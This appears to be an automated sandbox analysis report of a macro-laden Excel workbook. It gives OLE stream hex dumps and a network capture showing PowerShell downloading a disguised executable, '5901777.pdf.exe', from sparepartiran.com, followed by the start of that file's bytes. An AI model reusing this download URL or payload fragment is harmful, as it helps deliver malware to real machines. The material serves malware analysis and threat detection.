                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 228
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:228
                                              Entropy:2.83826051843
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . o l d g c a i b a . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 8e 00 00 00 02 00 00 00 e4 04 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 176
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:176
                                              Entropy:3.03638398782
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . P . . . . . . . ` . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . D e l l . . . . . . . . . . . . D e l l . . . . @ . . . . . . . . . . . @ . . . . . b . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 80 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 04 00 00 00 40 00 00 00 08 00 00 00 50 00 00 00 0c 00 00 00 60 00 00 00 0d 00 00 00 6c 00 00 00 13 00 00 00 78 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00 44 65 6c 6c 00 00 00 00
                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 200639
                                              General
                                              Stream Path:Workbook
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:200639
                                              Entropy:7.92744162749
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . D e l l B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P K . 8 . . . . . . . X . @
                                              Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 44 65 6c 6c 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 478
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:478
                                              Entropy:5.17133809761
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = o l d g c a i b a / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = 0 . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 6 9 4 3 A D 6 4 6 F A D 8 F E D 8 F E D C 0 2 D C 0 2 " . . D P B = " D 1 D 3 7 D 6 2 9 A 6 2 9 A 9 D 6 6 6 3 9 A 4 2 4 0 E 8 2 B D 8 8 8 E D
                                              Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 6f 6c 64 67 63 61 69 62 61 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d
                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 71
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                              File Type:data
                                              Stream Size:71
                                              Entropy:3.1232478398
                                              Base64 Encoded:False
                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . o l d g c a i b a . o . l . d . g . c . a . i . b . a . . . . .
                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 6f 6c 64 67 63 61 69 62 61 00 6f 00 6c 00 64 00 67 00 63 00 61 00 69 00 62 00 61 00 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              File Type:ISO-8859 text, with no line terminators
                                              Stream Size:7
                                              Entropy:1.84237099318
                                              Base64 Encoded:False
                                              Data ASCII:. a . . . . .
                                              Data Raw:cc 61 ff ff 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 224
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                              File Type:data
                                              Stream Size:224
                                              Entropy:5.5463550152
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . 0 . . . . . . . . H . . . . . . . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . Q . T . . . " < . . . . . . D . . . . . . . . . T . h i s W o r k b @ o o k G . . . . . . h . i . s . W . . o . r . k . b . . . o . . . . / 2 . / . . u . H . . 1 . . . . . , . C * " . . + . . . . ^ . . . o l d g c a i b . a G . . . . . l . . d . g . c . a . 4 j b . . . . . 2 . . . @ . . . .
                                              Data Raw:01 dc b0 80 01 00 04 00 00 00 01 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 00 08 05 06 12 09 02 12 a5 95 1f 51 06 54 00 0c 02 22 3c 02 0a 0f 02 b6 02 44 00 13 02 07 ff ff 19 02 1d 54 00 68 69 73 57 6f 72 6b 62 40 6f 6f 6b 47 00 18 01 11 00 00 68 00 69 00 73

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              Timestamp                            Source Port  Dest Port  Source IP         Dest IP
                                              Nov 27, 2020 11:38:08.703929901 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:08.777448893 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:08.824160099 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:08.824331045 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:08.837831020 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:08.895749092 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:08.896704912 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:08.898339987 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:08.956010103 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:08.958857059 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:08.958878994 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:08.958959103 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:08.959620953 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:08.959639072 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:08.959748030 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:08.959760904 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:08.959779978 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:08.959791899 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:08.959805012 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:08.959908009 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:08.959959030 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:08.959990978 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:08.960108042 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.016362906 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.019684076 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.019738913 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.019777060 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.019817114 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.019829988 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.019855976 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.019896030 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.019921064 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.020001888 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.020236015 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.020278931 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.020317078 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.020349979 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.020354986 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.021069050 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.064140081 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.079015970 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.079062939 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.079102993 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.079142094 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.079160929 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.079231977 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.081520081 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.081563950 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.081604004 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.081624985 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.081645966 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.081757069 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.084659100 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.084716082 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.084754944 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.084791899 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.084820032 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.084831953 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.084836006 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.084872007 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.084919930 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.084923029 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.084963083 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.085015059 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.087742090 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.087779045 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.087816954 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.087855101 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.087865114 CET  80           49743      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.088689089 CET  49743        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.137701035 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.137737989 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.137759924 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.137780905 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.137788057 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.137809038 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.137818098 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.137830019 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.137851000 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.137851954 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.137871981 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.137881994 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.137900114 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.138164997 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.138186932 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.138206959 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.138211966 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.138227940 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.138241053 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.138268948 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.138952017 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.138974905 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.138994932 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.138998032 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.139018059 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.139019966 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.139033079 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.139053106 CET  49744        80         192.168.2.3       162.223.88.131
                                              Nov 27, 2020 11:38:09.139137983 CET  80           49744      162.223.88.131    192.168.2.3
                                              Nov 27, 2020 11:38:09.139163971 CET  80           49744      162.223.88.131    192.168.2.3

                                              UDP Packets

                                              Timestamp                            Source Port  Dest Port  Source IP         Dest IP
                                              Nov 27, 2020 11:36:28.906232119 CET  58361        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:28.933271885 CET  53           58361      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:29.570267916 CET  63492        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:29.611063004 CET  53           63492      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:38.939960003 CET  60831        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:38.967020035 CET  53           60831      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:39.954265118 CET  60100        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:39.996702909 CET  53           60100      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:40.132668018 CET  53195        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:40.159857035 CET  53           53195      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:40.329982042 CET  50141        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:40.378119946 CET  53           50141      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:41.359257936 CET  50141        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:41.399657011 CET  53           50141      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:42.045535088 CET  53023        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:42.072751999 CET  53           53023      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:42.358972073 CET  50141        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:42.399580002 CET  53           50141      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:42.721008062 CET  49563        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:42.748132944 CET  53           49563      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:43.439760923 CET  51352        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:43.475255013 CET  53           51352      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:44.374624014 CET  50141        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:44.410218000 CET  53           50141      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:48.390551090 CET  50141        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:48.426340103 CET  53           50141      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:52.144023895 CET  59349        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:52.179600000 CET  53           59349      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:53.220006943 CET  57084        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:53.247128010 CET  53           57084      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:53.946345091 CET  58823        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:53.973597050 CET  53           58823      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:54.777817965 CET  57568        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:54.804825068 CET  53           57568      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:55.010998964 CET  50540        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:55.037981987 CET  53           50540      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:55.484256983 CET  54366        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:55.511518955 CET  53           54366      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:56.209888935 CET  53034        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:56.250344992 CET  53           53034      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:57.942320108 CET  57762        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:57.969628096 CET  53           57762      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:36:58.576900005 CET  55435        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:36:58.604027033 CET  53           55435      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:37:01.721138000 CET  50713        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:37:01.760047913 CET  53           50713      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:37:10.614938974 CET  56132        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:37:10.658346891 CET  53           56132      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:37:18.635252953 CET  58987        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:37:18.677719116 CET  53           58987      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:37:29.832556963 CET  56579        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:37:29.859958887 CET  53           56579      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:37:33.467720985 CET  60633        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:37:33.505007029 CET  53           60633      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:38:05.516347885 CET  61292        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:38:05.543705940 CET  53           61292      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:38:08.529928923 CET  63619        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:38:08.616806984 CET  64938        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:38:08.674444914 CET  53           63619      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:38:08.763250113 CET  53           64938      8.8.8.8           192.168.2.3
                                              Nov 27, 2020 11:38:11.222491980 CET  61946        53         192.168.2.3       8.8.8.8
                                              Nov 27, 2020 11:38:11.266062975 CET  53           61946      8.8.8.8           192.168.2.3

                                              DNS Queries

                                              Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name               Type            Class
                                              Nov 27, 2020 11:38:08.529928923 CET  192.168.2.3  8.8.8.8  0x7f0     Standard query (0)  sparepartiran.com  A (IP address)  IN (0x0001)
                                              Nov 27, 2020 11:38:08.616806984 CET  192.168.2.3  8.8.8.8  0x37a5    Standard query (0)  sparepartiran.com  A (IP address)  IN (0x0001)

                                              DNS Answers

                                              Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name               CName  Address         Type            Class
                                              Nov 27, 2020 11:38:08.674444914 CET  8.8.8.8    192.168.2.3  0x7f0     No error (0)  sparepartiran.com  -      162.223.88.131  A (IP address)  IN (0x0001)
                                              Nov 27, 2020 11:38:08.763250113 CET  8.8.8.8    192.168.2.3  0x37a5    No error (0)  sparepartiran.com  -      162.223.88.131  A (IP address)  IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • sparepartiran.com

                                              HTTP Packets

                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              0           192.168.2.3  49743        162.223.88.131  80                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Nov 27, 2020 11:38:08.837831020 CET  4976                OUT        GET /js/2Q/5901777.pdf.exe HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                              Host: sparepartiran.com
                                              Connection: Keep-Alive
                                              Nov 27, 2020 11:38:08.958857059 CET  4978                IN         HTTP/1.1 200 OK
                                              Date: Fri, 27 Nov 2020 10:38:08 GMT
                                              Server: Apache
                                              Last-Modified: Fri, 27 Nov 2020 09:07:10 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 552960
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b be c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 50 04 00 00 1e 04 00 00 00 00 00 4e 6f 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 6e 04 00 57 00 00 00 00 80 04 00 d8 1b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 4f 04 00 00 20 00 00 00 50 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 1b 04 00 00 80 04 00 00 1c 04 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 6f 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 4a 04 00 68 24 00 00 03 00 00 00 15 00 00 06 a0 30 00 00 ec 19 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 15 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 33 00 00 00 00 00 00 00 02 28 14 00 00 0a 02 1d 2d 13 26 02 
19 2d 15 26 02 15 2d 17 26 02 28 05 00 00 06 2b 15 28 03 00 00 06 2b e7 28 04 00 00 06 2b e5 28 07 00 00 06 2b e3 2a 00 13 30 07 00 8a 00 00 00 01 00 00 11 20 d9 03 00 00 1c 2d 1b 26 73 15 00 00 0a 1a 2d 15 26 73 58 00 00 06 1b 2d 0f 26 06 6f 16 00 00 0a 2b 10 0d 2b e3 0a 2b e9 13 04 2b ee 17 28 17 00 00 0a 06 6f 18 00 00 0a 09 6a 32 f0 02 d0 2b 00 00 01 28 19 00 00 0a 72 01 00 00 70 17 8d 48 00 00 01 0b 07 16 d0 01 00 00 1b 28 19 00 00 0a a2 07 28 1a 00 00 0a 14 17 8d 2a 00 00 01 0c 08 16 11 04 6f 5b 00 00 06 a2 08 6f 1b 00 00 0a 74 2b 00 00 01 7d 01 00 00 04 2a 00 00 03 30 09 00 20 00 00 00 00 00 00 00 02 02 7b 01 00 00 04 72 0b 00 00 70 6f 1c 00 00 0a 1d 2d 04 26 26 2b 07 7d 02 00 00 04 2b 00 2a 13 30 09 00 75 00 00 00 02 00 00 11 02 7b 02 00 00 04 28 1d 00 00 0a 19 2d 0a 26 7e 04 00 00 04 2d 49 2b 03 0a 2b f4 20 00 01 00 00 72 5f 00 00 70 14 d0 06 00 00 02 28 19 00 00 0a 17 8d 02 00 00 01 18 2d 1c 26 07 16 16 14 28 1e 00 00 0a a2 07 28 1f 00 00 0a 28 20 00 00 0a 15 2d 06 26 2b 0a 0b 2b e2 80 04 00 00 04 2b 00 7e 04 00 00 04 7b 21 00 00 0a 7e 04 00 00 04 06 6f 22 00 00 0a 2a 00 00 00 03 30 09 00 27 00 00 00 00 00 00 00 03 2c 13 02 7b 03 00 00 04 2c 0b 02 7b 03 00 00 04 6f 23 00 00 0a 02 03 17 2d 04 26 26 2b 07 28 24 00 00 0a 2b 00 2a 00 03 30 09 00 4a 00 00 00 00 00
